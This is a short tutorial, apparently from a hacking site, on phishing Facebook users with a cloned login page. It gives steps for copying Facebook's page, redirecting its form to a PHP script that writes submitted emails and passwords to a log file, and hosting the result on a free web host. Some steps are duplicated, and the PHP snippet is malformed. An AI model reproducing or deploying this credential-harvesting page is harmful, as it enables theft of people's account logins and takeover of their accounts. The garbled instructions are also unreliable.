Hacking Facebook Accounts is Easy with Fake login Page. To Make a Fake Login Page for Facebook. You Need to have some basic php and html skills.
Go to http://www.facebook.com/index.php and Save the Page as , I recommend Mozilla Firefox for this. Web Page Complete.
Once You Save the Files Put them in a Separate Directory. And Open the .htm file in Notepad. Find "action =" and replace the link with "login.php" or whatever you call your php file.
then You should Create the php File.Copy this code to Notepad
Save it as "login.php" or Whatever you call in action=" " put all the files in the directory.
then Create an Account in http://www.t35.com and upload all the files in the directory.
then You should Create the php File.Copy this code to Notepad
header ('Location: http://www.facebook.com/');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
if($variable=="email" || $variable == "pass")
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
Save it as "login.php" or Whatever you call in action=" " put all the files in the directory.
then Create an Account in http://www.t35.com and upload all the files in the directory.
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